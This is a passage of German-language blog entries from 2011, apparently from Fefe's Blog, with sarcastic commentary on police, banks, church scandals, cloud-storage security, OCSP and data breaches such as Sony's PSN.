[l] Jetzt ist es offiziell: Mark Duggan hat nicht auf die Polizei geschossen. Das war schlicht eine Lüge der Polizei. In diesem Fall ist das rausgekommen, weil die Bevölkerung den Aufstand probt. Ich frage mich, wie viele andere Fälle es gibt, wo das nie jemand prüft. Denn die Stimme eines Polizisten zählt ja immer mehr als die Stimme eines Bürgers, erst Recht wenn der inzwischen tot ist.
Übrigens hat der Guardian mal eine interaktive Karte der Ausschreitungen gemacht, das verbreitet sich gerade über das Land.
Update: Oh auf ein Detail sei noch hingewiesen:
The IPCC's statement said the bullet lodged in the police radio was a "jacketed round". This is a police-issue bullet and is "consistent with having been fired from a [police] Heckler and Koch MP5", it said.
Das ist eine Maschinenpistole.

Sat Aug 6 2011

[l] ACH NEE. Ein Insider hat am Donnerstag eine fette Börsen-Wette gemacht, dass die US-Anleihen ihr AAA verlieren.
The value of the trade was about $850 million dollars. In simple terms, if that was a direct bond buy, no one would be talking about it.
However, with the use of futures, you have to have margin capacity behind the trade. That means with a single push of a button someone was willing to commit more than $1 billion of real capital to this trade with expectations of a 10-to-1 return ratio.
(siehe auch)

Thu Aug 4 2011

[l] Hier sind ein Haufen Mails zu der SPD-IPv6-Nummer eingegangen. Diverse haben darauf hingewiesen, dass das Benutzer-Content und nicht notwendigerweise die Parteimeinung ist. ACH NEE. WIRKLICH? Niemand hat die SPD gezwungen, fremde Leute Content auf www.spd.de zu veröffentlichen. Wenn sie es tun, machen sie es sich zu eigen, ob ihnen das gefällt oder nicht. Sie hätten es ja mitglieder.spd.de nennen können.
Dann kamen ein paar Gebildete und wiesen darauf hin, dass das offensichtlich eine Satire sei. ACH NEE. Und was schlagt ihr vor, dass ich das dranschreibe? Und meinen Lesern die Freude am das selbst herausfinden nehme?
Und jetzt werde ich hier auch noch von Markus von der Seite angepflaumt. Nanu?
Wieso ist das denn plötzlich alles so unentspannt im Internet?
Leute, entspannt euch mal alle. Es sind Sommerferien. Geht mal raus. Sonne und so. Macht ne Fahrradtour, geht mal mit Freunden gepflegt grillen. Und hört auf, im Internet schlechte Laune zu verbreiten. Ich hab jedenfalls keinen Bock, mich von Markus anpflaumen zu lassen, nur weil dem gerade irgendeine Laus über die Leber gelaufen ist.
Im Übrigen: selbstverständlich würde ich das genau so mit der CDU oder den Piraten machen. Ich habe das neulich erst mit den Linken so gemacht. Wenn eine Partei eine Position auf einer offiziellen Webseite veröffentlicht, dann werte ich das als offizielle Parteiposition, ob das so ist oder nicht.

Wed Aug 3 2011

[l] Fazialpalmierung des Tages: Firefox hat mich gerade beim Zugriff auf mein Blog gewarnt, dass da Teile unverschlüsselt übertragen würden. Das war mir neu. Also habe ich mal tcpdump mitlaufen lassen.
Stellt sich raus: Firefox hat Recht. Nicht alles ist verschlüsselt.
Ratet mal, was nicht verschlüsselt war.
Kommt ihr NIE drauf!
Der OCSP-POST-Request zu cacert.org.
Update: Weil hier verzweifelte Nachfragen kommen: Wenn man SSL macht, wird die Verbindung verschlüsselt und signiert. Die Signatur ist mit einem Schlüssel gemacht, von dem man nicht weiß, ob der nicht in der Zwischenzeit zurückgerufen wurde (Reallebenäquivalent wäre der Bankautomat, der prüfen will, ob die Karte gestohlen gemeldet wurde). Für diese Prüfung gibt es ein Protokoll namens OCSP. Der Schlüssel, der die Webdaten unterschrieben hat, ist selbst unterschrieben, von einer sogenannten CA. In meinem Fall ist das cacert.org. Per OCSP geht jetzt der Browser beim Besuch meiner Webseite zu cacert.org und fragt die, ob mein Zertifikat eigentlich noch gültig ist. Und diese Verbindung ist unverschlüsselt, darüber hat sich mein Firefox geärgert.
Nun klingt das alles wie "na das muss man doch aber auch absichern!!1!", und das stimmt auch, aber OCSP überträgt über den unsicheren Kanal auch signierte Daten. Und sieht auch eine Möglichkeit vor, um Replay-Angriffe (also das Abspielen einer früher aufgezeichneten "ist OK" Antwort) zu verhindern. In der Praxis ist das alles eine furchtbare Baustelle, weil SSL halt insgesamt an diversen Stellen krankt. Sonderlich zielführend ist diese Warnung jedenfalls nicht, als erstes Mal schon weil er mir bei der Warnung nicht gesagt hat, welcher Teil da jetzt unverschlüsselt übertragen wurde.

Wed Jul 27 2011

[l] Was für ein bizarrer Tag. Der Friedrich entdeckt plötzlich zu seiner größten Verwunderung, dass es Rechtsextremismus gibt. In der CSU müssen die ja alle sehr behütete Kindheiten gehabt haben. Oder dieser Friedrich ist wirklich so ein trübes Licht. Der versteckt seine Kompetenz sicher nur sehr geschickt vor uns. Irgendwann wird der uns alle überraschen und etwas schlaues sagen.
Und dann kam heute noch raus, dass der Breivik in einem Schützenverein war. Ich hatten mir schon ein bisschen Sorgen gemacht, dass er ein Ausreißer würde, der erste Massenmörder/Amokläufer ohne Schützenverein-Hintergrund. Aber ich hätte mir keine Sorgen machen müssen deshalb. Die kommen ALLE aus Schützenvereinen. Muss ja auch, woher sonst sollen die schießen können. Aber fürchtet euch nicht, der Schützenverein hat ihn mit sofortiger Wirkung ausgeschlossen. Na DANN können wir ja jetzt wieder alle ruhig schlafen.
Frank hat sich mal einen Teil von Breiviks Geschreibsel angeguckt und der detailliert da wohl ausführlich alle Schritte seiner Vorbereitungen. Wie er versucht hat, sich Waffen illegal zu besorgen, aber das war wohl nicht so einfach wie er sich das gedacht hatte, also ist er in den Schützenverein. Wieso verbieten wir nicht einfach alle Schützenvereine? Haben wir Angst, dass die Polizei so ohne Amokläufer und Terroristen dann nichts mehr zu tun haben wird?
Gut, er hätte immer noch seine Bombe bauen können. Da hat er sich den Bauernhof angeschafft, um Dünger in großen Mengen kaufen zu können, und hat auch schön anderen Dünger dazu gekauft, um nicht ins Raster zu fallen. Da kann man wohl nicht viel gegen machen. Seine Bombe hat er wohl ganz altmodisch per Lunte gezündet, nicht per Handy-Fernzünder oder so.

Fri Jul 22 2011

[l] Erinnert ihr euch an die US-Bankenrettung TARP? Wo die US Treasury den ranzigen Banken Milliarden geliehen haben? Wo es damals hieß, hey, das seht ihr nie wieder, das Geld? Und wo es jetzt heißt, sie hätten so gut wie alles zurückgekriegt und sogar noch Profit gemacht?
Nun, in Prinzip ja, nur haben die Banken das zurückgezahlt, indem sie sich von anderen Treasury-Programmen Geld geliehen haben, um das zurückzahlen zu können.
All of which is to say that these banks repaid cash owed to a program run by the Treasury Department by. . . borrowing from another program run by the Treasury Department.
Super, so ein Aufschwung! Wie wir die alle gerettet haben, da können wir uns jetzt richtig gut fühlen!
Und was das für ein schöner Win-Win ist! Die Banken können demonstrieren, dass sie stabil sind und die Kohle eigentlich gar nicht brauchten. Die Regierung kann demonstrieren, dass ihr Vertrauen in die Banken gerechtfertigt war und ihr Programm ein Erfolg war.

Fri Jul 15 2011

[l] Nina Paley ist ungehalten, weil die GEMA ihren Film bei Youtube geblockt hat.
Sie bemängelt, dass es für betrügerische Zensur mittels DMCA ein Protokoll zum widersprechen gäbe, aber offenbar nicht für betrügerische GEMA-Zensur (ihre Worte). Wenn ihr mich fragt, hat sie da das Problem voll erkannt.
Im Übrigen bin ich der Meinung, dass die GEMA zugemacht werden muss.

Sat Jul 9 2011

[l] Die katholische Kirche lässt jetzt ihre Personalakten nach Kindesmissbrauch durchgucken. Der bisherige Ansatz war ja, eine Diskussion frühestens zuzulassen, sobald die Taten verjährt waren.
Naja gut, wenn es um brutalstmögliche Aufklärung gibt, dann übergibt man die Arbeit natürlich einer echten Spitzenkraft. Jemandem, bei dem kein Stein auf dem anderen bleibt. Der sich durch differenzierte Herangehensweise einen Namen gemacht hat. Jemand, der lieber forscht als sich in Talkshows zu produzieren. Kurz: Jemanden wie das KFN, das Kriminologische Forschungsinstitut Niedersachsen. Sagt euch nichts? Vielleicht sagt euch ja deren Direktor etwas, Christian Pfeiffer.
Na? Auch nicht? Ich helfe eurem Gedächtnis auf die Sprünge. Das ist der, der für "Moslems sind kriminell", "die Polizisten werden dauernd verprügelt" (oder doch nicht?) und "Computerspiele machen Kinder zu Killern" bekannt geworden ist, weil er diese plumpen Phrasen der Politiker immer gerne mal mit einem wissenschaftlicher Schein unterfüttert, jedenfalls genug für die Presse, die das im Allgemeinen unkritisch übernimmt. Der Stern hatte mal einen schönen Kommentar zu dem. Die erinnern auch an Pfeiffers andere eher unterzeugende Arbeit über die Ursachen von Rechtsextremismus in den fünf neuen Bundesländern ("die Ostler sind alle Nazis, weil sie in den DDR-Kindergärten gemeinsam aufs Töpfchen gehen mussten").
Insofern passt der perfekt zur katholischen Kirche. Ursachen und Hintergründe interessieren nicht, die Wahrheit kennen wir ja schon. Unterschreiben Sie hier, hier, hier und hier, das Geld ist ja schon überweisen, OK, hier ist Ihre Absolution!
Aus Sicht der katholischen Kirche kann ich mir das auch gut vorstellen. Die haben halt gesehen, wie der die arme Polizei von Tätern zu Opfern gemacht hat. Passt!
Oh und wenn sich jemand denkt, so ein rationaler Wissenschaftler passt nicht zur organisierten Religion — guckt mal, der Pfeiffer predigt auch schon mal in der Kreuzkirche Hannover. Keine weiteren Fragen. (Danke, Rainer)

Tue Jul 5 2011

[l] Ich habe eine Mail von padeluun gekriegt. Er bittet darum, meine Darstellung von gestern zu korrigieren. Begründung: er habe die ganze Zeit massiv gegen Schwarz-Gelb gestimmt (stimmt), er habe sich bei seinen Gegenstimmen auch richtig Scheiße gefühlt (mag sein), aber:
Aber ich KONNTE sie nicht mit der RegKoalition abstimmen, weil die Einzelpositionen so von mir nicht getragen werden konnten --> schließlich bin ich für die gegenteiligen Positionen auf die Straße gegangen - und habe Proteste dagegen initiiert.
Ich finde das kein tragfähiges Argument, dass er das nicht mit der Regierungskoalition abstimmen konnte, denn er ist da seinem Gewissen verpflichtet, nicht der Regierungskoalition. Die Widersprüche, die er da anspricht, mag es wohl geben, aber das ändert nichts daran, wie es jetzt aussieht.
Und so sieht es aus: padeluun (und die anderen Teilnehmer der Enquete) kriegen dafür Geld, dass sie da hingehen. Padeluun hat sich Visitenkarten drucken lassen für seine Position dort. Jetzt hatte er die Chance, den Geldfluss zu verlängern, was für einen chronisch klammen Aktivisten sicher ein verlockendes Angebot ist. Entweder für die gute Sache stimmen oder für einen sicheren Geldfluss. Und er hat für den Geldfluss in Form einer Verlängerung gestimmt. So sieht das leider aus.
Ich will gar nicht mal behaupten, dass das auch so geschehen ist, oder gar padeluuns Darstellung bestreiten. Aber es sieht einfach mal nicht gut aus, und das Ergebnis ist, dass die Enquete sich jetzt nicht für die gesetzliche Festschreibung von Netzneutralität ausgesprochen hat, obwohl die Mehrheit dagewesen wäre, wenn padeluun dafür gestimmt hätte.
Tut mir leid, wenn ich jetzt hier unsolidarisch wirke, wie mir auch vereinzelt vorgeworfen wurde, aber so leicht kommt padeluun da nicht raus.
Das Hauptproblem für mich ist, dass diese Strategie so offensichtlich aussieht. Im politischen Geschäft hat man Analysten, die die Schwächen der Gegenseite herausfinden, damit man sie gegen sie verwenden kann. Und die erste offensichtliche Schwäche bei uns Aktivisten ist, dass wir im Gegensatz zu den gutbezahlten Abgeordneten potentiell bestechlich sind :-) Jedenfalls war das immer das Argument für die hohen Diäten *hust*
Und mit der Visitenkartennummer hat padeluun denen die zweite angreifbare Schwäche offenbart, nämlich dass ihm die Position am Herzen liegt, und man mit einer Verlängerung sein Ego streicheln kann.
Wenn ich also CDU-Analyst wäre, wäre das die offensichtliche Taktik gewesen, um padeluuns Stimme zu kaufen. So haben sie es gemacht und der Rest ist Geschichte.
Also, zusammenfassend gesagt: mag alles sein, padeluun, und tut mir auch ein bisschen leid, dass du da jetzt so die Arschkarte gezogen hast, aber da musst du jetzt durch. Ich bleibe bei meiner Darstellung.
Übrigens, um das mal ganz klar zu machen: ich unterstelle ihm da keine Bösartigkeit oder Sabotageabsichten. Die haben ihm halt eine Falle gestellt und er ist reingelaufen. Da kann man jetzt über die Motivation oder Gründe spekulieren, aber am Ende des Tages bleiben die Fakten, dass die Enquete-Kommission sich mit seiner Stimme für die gesetzliche Festschreibung der Netzneutralität ausgesprochen hätte, und er andersherum abgestimmt hat.
Update: Ich werfe padeluun keine Bestechlichkeit vor. Ich sage, dass es so aussieht. Das ist in der Politik allerdings praktisch genau so schlimm. Padeluun ist mein Freund und ich will ihm nichts Böses. Das soll kein Bashing sein hier, sondern es soll uns helfen, solche Scheißsituationen in Zukunft zu verhindern. Jetzt ist das Kind eh in den Brunnen gefallen.

Tue Jun 21 2011

[l] Bei mir haben sich ja die Dropbox-Missionierungen in Grenzen gehalten, aber aus meinem Bekanntenkreis höre ich ein gewisses Grundrauschen an Genervtsein über Leute, die einem Dropbox überhelfen wollen. Vor allem die üblichen Verdächtigen aus der Hirnlosen-Front, Apple-User. Was tut Dropbox? Das ist ein Dienst zum Hochladen von Dateien, die man dann anderen zugänglich machen kann. Es gibt da wohl ein besonders benutzerfreundliches GUI (und seien wir mal ehrlich, alle anderen Gesichtspunkte sind für Apple-User zweitrangig), über das man eine ganz wunderbare Integration in sein Betriebssystem kriegt. Who cares. Ich habe mir das nie angeschaut. Denn eines ist klar: die Dateien liegen dann BEI JEMAND ANDEREM, den ich NICHT KENNE. Im Ausland.
Gut, wenn ich so einen Dienst anbieten wollen würde, wären die Daten selbstverständlich verschlüsselt, und zwar vom Design her so, dass ich die Keys nicht speichere, sondern dass die sich aus den Passwörtern ergeben, damit selbst wenn jemand in meinem Rechenzentrum alle Platten klaut, die Daten der Kunden sicher sind. So würde man das machen, und man würde es offen kommunizieren, damit man im Fall von "die Daten sind irgendwo aufgetaucht" plausible deniability hat.
Auch Dropbox hat einige nebulöse Andeutungen gemacht, die man so deuten konnte, als hätten sie da ordentliche Krypto am Start. Aber dann passierte das hier: Man kam ein paar Stunden lang versehentlich ohne Passwort an jedermanns Account heran. Damit ist klar: die Daten sind nicht so verschlüsselt, dass Dropbox da nicht rankäme. Und ich fühle mich in meinem Zynismus vollauf bestätigt und kann nur weiterhin jeden warnen, seine Daten irgendwelchen Webdiensten anzuvertrauen. Mir ist ja völlig unklar, was in den Köpfen der Leute vorging, die da ihre Korrespondenz gelagert und ihre persönlichen Daten dorthin "gebackupt" haben. WTF?

Thu Jun 16 2011

[l] Lacher des Tages: Abmahnung gegen sächsisches Staatsministerium wegen fehlenden Impressums auf kino.to. HAHAHAHAHAHA, Popcorn!! (via)

Sun Jun 12 2011

[l] Oh nein, die Hacker!! Wir werden alle sterben! Jetzt wird der Weltwährungsfonds gehackt und das ist alles so furchtbar, dass die Weltbank ihre Netzanbindung über die Straße zum Weltwährungsfonds zugemacht hat.
So viel Hackerei überall, es ist noch nicht zu spät ein Trinkspiel auszurufen!

Thu Jun 9 2011

[l] Hier hat sich mal jemand die Mühe gemacht, die Anlässe für die Telekommunikationsüberwachung zu recherchieren. Das klingt einfacher als es ist:
Die Abhörstatistik der Bundesregierung findet man nicht etwa auf der Homepage des Bundesinnenministeriums, auch nicht auf den Seiten des Bundesjustizministeriums, sondern im Untermenü einer Seite des Bundesamtes für Justiz mit Sitz in Bonn.
Und natürlich auch nur als unaufbereitetes nacktes Zahlenmaterial. Der leicht zu merkende, einprägsame Link dazu ist hier fürs Archiv hinterlegt, wenn er sich nicht jetzt spontan ändert, weil ihn nennenswert Leute gefunden haben.
Nun, jedenfalls, in der graphischen Aufschlüsselung wird klar, was für eine groteske, freche, widerliche, stinkende Lüge dieses ganze Terror- und Kinderporno-Gefasel doch ist.

Tue Jun 7 2011

[l] In der Wirtschaft (und der Natur) gibt es gelegentlich selbstverstärkende Kreisläufe, die nicht immer vorher absehbar waren oder zumindest nicht gesehen wurden vorher. Einer, den man im Moment in Griechenland beobachten kann, ist dass die Wirtschaftskrise viele Männer arbeitslos gemacht hat. Der Effekt ist, dass die Frauen vermehrt Arbeit suchen, um das Familieneinkommen zu sichern, und das verschärft natürlich die Arbeitslosenzahlen. Im Übrigen gab es ja vorher schon zu wenig Jobs, das wird natürlich nicht besser wenn es mehr Nachfrage gibt.

Thu Jun 2 2011

[l] Chinesische Hacker haben angeblich die persönlichen Email-Accounts von hunderten von Top-Politikern, -Militärs und -Journalisten aus den USA aufgemacht.
"Chinesische Hacker" ist inzwischen sowas wie Al Kaida. Oder IBM. Noch nie ist jemand gefeuert worden, weil er IBM kaufte. Und es wird auch keiner gefeuert, dessen System von chinesischen Hackern aufgemacht wurde. Das ist echt nur noch lächerlich, finde ich.
Mein erster Gedanke war natürlich an die neue Kriegs-Doktrin bei "Hackerangriffen". Was jetzt? Bombardieren sie jetzt China? Nicht? Ach was.
Der zweite Gedanke war: boah, so blöde können die doch nicht wirklich sein, ihre Mail bei Google liegen zu haben?! Hallo? Militärs?! Politiker?!? Vielleicht am Ende noch mit Geheimpapieren in der Inbox? *fazialpalmier*
Aber hey, wie schon Einstein sagte. Zwei Dinge sind unendlich. Das Universum und die Dummheit der Menschen. Und beim Universum war er sich noch nicht sicher.

Wed Jun 1 2011

[l] Bei der Meldung hat jeder was zu lachen: Katholische Ärzte wollen Homosexualität mit Homöopathie heilen.
Das hatte mir jemand vor ein-zwei Wochen gemailt und ich hab das nicht gebracht, weil ich die Webseite der katholischen Ärzte für eine Satire hielt. Ich fand nicht, dass man sich über die Katholiken so plump lustig machen sollte, weil es ja genügend stilistisch weniger plumpe Kritikpunkte an denen gibt.

Tue May 31 2011

[l] Wisst ihr, wer der schlimmste Feind Gaddafis ist? Wer da am meisten Schaden angerichtet hat? Vergesst die Rebellen, Goldman Sachs hat ein 1,3 Milliarden Investment von Gaddafi um 98% im Wert gesenkt. Und dann haben sie nochmal das Messer tiefer reingerammt, indem sie ihm angeboten haben, dass Libyen dem Geld nochmal 3.7 Milliarden Dollar hinterherwirft, und dafür Goldman-Anteile erhält. Das war genau die Zeit, als Goldman Sachs wie eine der demnächst platzenden Investmentbanken aussah. Gaddafi hat das dann lieber nicht gemacht. Und Goldman hat sich dann insgeheim von der Fed 30 Milliarden unter dem Tisch geborgt, genau wie Credit Suisse und die Royal Bank of Scotland.
[l] Oh wow, zu "sofortüberweisung" erreicht mich gerade der Hinweis, dass das Bundeskartellamt die Position vertritt, dass Bank-AGBs nichtig sind, soweit sie "bankenunabhängigen Direktüberweisungsverfahren den Marktzutritt verwehren". Mit anderen Worten: die Bank darf den Benutzern gar nicht verbieten, ihre Logindaten weiterzugeben, weil das wettbewerbswidrig sei. Un-glaub-lich. Das ist voll an mir vorbeigegangen. Heftig. Stellt sich natürlich die Frage, wer haftet und wer die Beweislast trägt. Wenn die Leute jetzt wild im Internet ihre Bank-Logindaten eingeben dürfen, und am Ende die Banken haften müssen, werden die das ja auch auf alle Kunden umlegen und am Ende zahlen wir, ob wir was falsch gemacht haben oder nicht. Was für eine üble Fehlentscheidung des Kartellamtes! (Danke, Kris)

Mon May 30 2011

[l] Bayerisches LKA kauft für 30.000 Euro Falschgeld-Euros vom mazedonischen Geheimdienst. Eigentlich wollten die ermitteln, wo Falschgeld herkam, und haben daher einen Deal mit einem Verdächtigen aufgesetzt, um Beweise gegen den zu kriegen. Und dann stellte sich heraus, dass auf der anderen Seite der mazedonische Geheimdienst den Deal eingefädelt hatte, vermutlich aus demselben Grund. Jedenfalls behauptet der Mann in der Mitte jetzt, beide Seiten hätten ihn zu einer Transaktion getrieben, die er sonst nie gemacht hätte.
Dokumente belegen, dass das LKA und der mazedonische Geheimdienst die Fäden gezogen haben bei den Deals, ohne vom Treiben des jeweils anderen zu wissen. Womöglich haben die Behörden die Beschaffung der Blüten sogar in einer Weise angeschoben, die andere zu Straftaten veranlasst hat, die sie sonst nicht begangen hätten.
Die BESTEN der BESTEN der BESTEN, SIR!
Haben wir wirklich so wenig echte Kriminalität, dass der Markt zu einem so großen Teil aus Undercover-Agenten besteht, dass die sich gegenseitig hopsnehmen?! (Danke, Michael)

Wed May 25 2011

[l] Adam Curtis hat eine neue Doku-Reihe mit dem Namen "All Watched Over by Machines of Loving Grace" gemacht. Wer Adam Curtis nicht kennt, der sollte sich mal ein Wochenende Zeit nehmen und dem hinterhergoogeln. Der hat eine Reihe von großartigen Doku-Serien gemacht, die in meinen Augen wichtigste und bekannteste ist The Power of Nightmares. Sehr empfehlenswert, kann man z.B. bei Youtube finden.
Die neue Dokumentation handelt davon, wie die Menschheit sich in die Abhängigkeit von Maschinen begeben hat. Ich habe sie selber noch nicht gesehen, sehe aber gerade, dass die schon online ist (Youtube-Playlist) und empfehle die mal angesichts der Güte des bisherigen Werks von Adam Curtis ungesehen.
Ihr solltet euch aber zuerst The Power of Nightmares angucken, um ein Gefühl für Adam Curtis zu kriegen. Bei Adam Curtis geht es um Erkenntnis, nicht um Faktenvermittlung.
Update: So, hab mir das mal angeguckt, und bin begeistert. Exzellenter Mindfuck.

Thu May 19 2011

[l] Rolf Schälike berichtet aus dem Hamburger Gefängnis. Money Quote:
Sie sind ein Klugscheißer und Besserwisser, sagte der Bedienstete. Ich erwiderte, sie haben mich eben beleidigt. Er sagte, sie sind Scheiße, ein Stück Scheiße kann man nicht beleidigen. Die Tür wurde zugemacht.
Schälike saß schon in der DDR im Stasi-Knast und hat daher an der Stelle eine Vergleichsmöglichkeit. Wer jetzt auf einen Witz mit historische Kontinuität gehofft hat, den muss ich enttäuschen: im Stasi-Knast ist er besser behandelt worden.
[l] In einem Arbeitsamt in Frankfurt haben sie die Lösung für die hohe Arbeitslosigkeit mal im Betatest laufen lassen: Arbeitslose erschießen. Vorher müssen sie natürlich wütend gemacht werden, damit sie einen Vorwand liefern. Aber das ist ja auch schon in der ausgerollten Version der Arbeitsämter gegeben mit dem wütend machen.

Fri May 13 2011

[l] Und wo wir gerade beim Rückbau von Zivilisation und der Aufklärung waren: Auch die Prostitution ist den "Christen" ein Dorn im Auge. Und zwar nicht irgendwelche Christen, sondern eine obskure evangelikale Freikirche, d.h. genau die Art von Gruppierung, die auch die USA unter Bush von Grundauf kaputtgemacht haben. Na das ist ja SUPER, dass ausgerechnet solche Leute jetzt bei uns Einfluss haben.
Kristina Schröder, Bundesfamilienministerin unter Merkel und bekennendes Mitglied der für die Rechristianisierung Europas eintretenden Selbständigen Evangelisch-Lutherischen Kirche (SELK) — eine evangelikale Sekte, der auch die Familie des Zeitungsverlegers Axel Springer angehört --, will nach einem lobenden Bericht der Springer-Zeitung DIE WELT vom 23.04.2011 das rot-grüne Prostitutionsgesetz von 2002 endgültig kippen und stattdessen ein *schärferes Bordell-Gesetz* verabschieden.
Wo kämen wir da auch hin, wenn Leute einfach so zum Spaß miteinander Sex haben. Das geht ja mal gar nicht. Sonst wäre das in der Bibel erwähnt!1!!
Update: Diverse Antiviren meckern wohl rum, dass die Site einem Malware unterjubeln will. Tja, Wordpress halt. Ich verstehe ja eh nicht, wieso Leute das einsetzen. Mir ist da nichts aufgefallen, aber mich betrifft sowas ja auch nicht so :-) Den Link habe ich mal rausgenommen. Ich hätte ja von meinen Lesern nicht gedacht, dass sie Browser einsetzen, die für sowas anfällig sind. Fürs Archiv: der Link war http://www.donacarmen.de/?p=476

Sat May 7 2011

[l] Als die Amis einen kanadischen Staatsbürger von Kanada ausgeliefert haben wollten, für dessen Entführung aus Pakistan sie vorher dem pakistanischen Geheimdienst ISI eine halbe Million Dollar gezahlt haben, hat ein Richter in Toronto das abgelehnt. Begründung: die üblen Menschenrechtsverletzungen, die die USA begangen haben, um diesen Mann zu kriegen / zu befragen. Die USA werfen ihm vor, Munition für Al Kaida beschafft zu haben.
Die USA haben natürlich die nächste Instanz angerufen, und die hat jetzt der ersten Instanz Recht gegeben — und zwar einstimmig. Hier ist, was die Amis und Pakistaner dem angetan haben sollen:
He was denied access to courts and consular officials, beaten until he cooperated with the ISI and detained at a secret location for 14 months.
U.S. authorities discouraged a request from a Canadian Security Intelligence Service officer in Pakistan that Khadr be granted access to the Canadian consulate.
U.S. officials wanted Pakistan to allow for his rendition to the U.S., but it refused to do so without Canada’s consent, which was denied.
Kanada hat ja in letzter Zeit auch das eine oder andere Mal mit Anlauf ins Klo gegriffen, aber mit dieser Entscheidung haben sie wieder einiges gutgemacht bei mir. Die explizite Ansage ist, dass eine Auslieferung hieße, dass man Folter und menschenunwürdige Behandlung gutheißen würde, und das kommt nicht in Frage.

Fri May 6 2011

[l] Einen lustigen Twist gibt es noch bei der bin Laden-Geschichte. Es haben sich ja viele Leute darüber lustig gemacht, dass dieses Haus da so groß war, kein Internet und kein Telefon hatte, und weniger als einen Kilometer von der bedeutensten Militärakademie Pakistans entfernt war. Außerdem wohnen in der Gegend lauter pensionierte Militärs. Da hätte doch so ein Haus auffallen müssen!1!!
Nun, nicht nur den bin Laden haben sie nicht bemerkt, sondern auch die CIA hat in Abbottabad ein Safe House aufgemacht, um das andere Haus beobachten zu können, und das hat offensichtlich auch niemand gemerkt. :-)

Mon May 2 2011

[l] Aha, soso, angeblich haben die Amis Osama bin Laden in Pakistan erschossen. Und damit das auch ja keiner prüfen kann, haben sie schnell den Leichnam "im Meer bestattet".
Update: Lacher am Rande: bedauerlicher Tippfehler bei der Fox-Berichterstattung, und auch unser Regierungssprecher hat versehentlich die Wahrheit getweetet.
Update: Mir ist vor allem unklar, wieso sie das jetzt gemacht haben, und nicht kurz vor der Wahl 2012. Amateure!
Update: Hier ist die Begründung für die schnelle Seebestattung:
Finding a country willing to accept the remains of the world's most wanted terrorist would have been difficult, the official said. So the U.S. decided to bury him at sea.
Und das musste so schnell gehen, weil man im Islam innerhalb von 24h bestatten soll. Hätten sie sich mal in Guantanamo so respektvoll dem Islam gegenüber verhalten.

Sun May 1 2011

[l] Oh, einen hab ich noch. Zu der Lötkolben-Story. Ich regte mich ja vorhin darüber auf, dass die Presse da immer von Anti-Terror-Gesetzen spricht. Stellt sich raus, in der Politik sieht man das realistischer:
"Mit den Festnahmen zeigt sich, wie sinnvoll etwa die Übertragung von Aufgaben des internationalen Terrorismus auf das Bundeskriminalamt im Jahre 2009 war. Und es zeigt sich, wie sehr wir unsere Bevölkerung schützen müssen", sagte Friedrich.
Seht ihr? Mit den Aufgaben des internationalen Terrorismus ist bei uns das Bundeskriminalamt betraut. Sagt unser Innenminister. Hab ich doch gleich gesagt!
Und für den Fall, dass sich das jetzt spontan beim ehemaligen Nachrichtenmagazin ändert hab ich einen Screenshot gemacht. (Danke, Matthias)

Fri Apr 29 2011

[l] Bei Amazons Cloud-Zusammenbruch sind auch noch Daten verlorengegangen. Backups? Haben sie offensichtlich nicht gemacht.
Ich reihe mich da mal in die lange "told you so"-Schlange ein :-)
Wer jetzt noch seine Daten in der Cloud lagert, dem ist echt nicht mehr zu helfen.

Thu Apr 28 2011

[l] Und noch ein Datenskandal: Tomtom soll die Daten seiner User an die Polizei verkauft haben, die damit die optimalen Plätze für Geschwindigkeitskontrollen berechnet haben sollen. Das würde mich ja ehrlich gesagt wundern, wenn das alles wäre, was die damit gemacht haben.

Wed Apr 27 2011

[l] Sony ist neulich das Playstation Network um die Ohren geflogen. Im Internet kursierten natürlich sofort diverse Theorien, u.a. dass jemand einen Weg gefunden haben soll, sich mit jailbreak-Konsolen und falscher Kreditkarte in der dev-PSN einzuwählen und dann dort Inhalte zu erschleichen und sie daher zugemacht haben, oder dass schlicht Portal 2 Schuld war, weil zuviel Last war. Nur von Sony hörte man nicht viel.
Jetzt hat Sony Stellung genommen und sprechen von einer "illegal and unauthorized intrusion into our network", und sie glauben sogar, dass der Eindringling sich einmal die persönlichen Daten aller User kopiert hat, sie wollen nichtmal ausschließen, dass auch die Kreditkartendaten abhandengekommen sind. Autsch. Wir reden hier immerhin von über 50 Millionen Accounts (die Schätzungen gehen auseinander, 50 ist wohl die untere Schranke). (Danke, Marco)

Tue Apr 26 2011

[l] Erinnert ihr euch an den Bundeswehr-Ausflug in den Mauerpark? Da hat Ulla Jelpke von der Linksfraktion mal nachgefragt, und die Antwort ist etwas länglicher. Kurz zusammengefasst sagen sie, dass keinerlei Amtshilfeersuchen vorliegen.
Die auf http/erdgeist.org/Bundeswehr abgebildete „Begehung des Berliner Mauerparks“ von Bundeswehroffizieren mit Berliner Polizeibeamten war Teil einer im Rahmen der gemäß der Zentralen Dienstvorschrift (ZDv) 12/1 durchzuführenden „Politischen Bildung in der Bundeswehr“ erfolgten Unterrichtsfahrt von Angehörigen des Personalamtes der Bundeswehr (PersABw) aus Köln. Die Begehung am Mauerpark diente dabei der Darstellung der ehemaligen Grenzlage, sowie der Information über polizeilich relevante Einsätze im Rahmen des Einzeldienstes. Eine Beteiligung der Bundeswehr an Polizeieinsätzen rund um den 1. Mai wurde weder erörtert noch ist sie vorgesehen.
(die kaputte "URL" kommt so von denen)
Update: Erdgeist hat mal ein PNG aus dem PDF gemacht.
[l] Gruseliges Exposee über Polizeibrutalität und -ungerechtigkeit in den USA, festgemacht am Beispiel New Orleans. Money Quote:
That the police force in New Orleans is "a significant threat to the safety of the public", as the DoJ says, is obvious. But the same problems can be seen all over the South, from Miami to Mississippi to Alabama; and the same nationwide, according to Paul Craig Roberts, a former editor of the Wall Street Journal and former assistant secretary to the treasury under Ronald Reagan, who wrote recently: "Police in the US now rival criminals, and exceed terrorists as the greatest threat to the American public."

Sun Apr 24 2011

[l] Die Japanische Bevölkerung fängt langsam an, mit der Atomkraft unzufrieden zu sein. Sie haben sogar eine Demonstration gemacht jetzt.
Doch selten zuvor sind so viele Atomkraftgegner in Tokio einem Aufruf gefolgt und mit Spruchbändern auf die Straße gezogen. Auf einer Fahne steht auf Deutsch "Atomkraft? Nein Danke". Eine Demonstrantin hält ein großes Schild aus Pappe. Darauf steht: "Wir wollen endlich wieder Fisch essen!"
Und dann dieser Brüller:
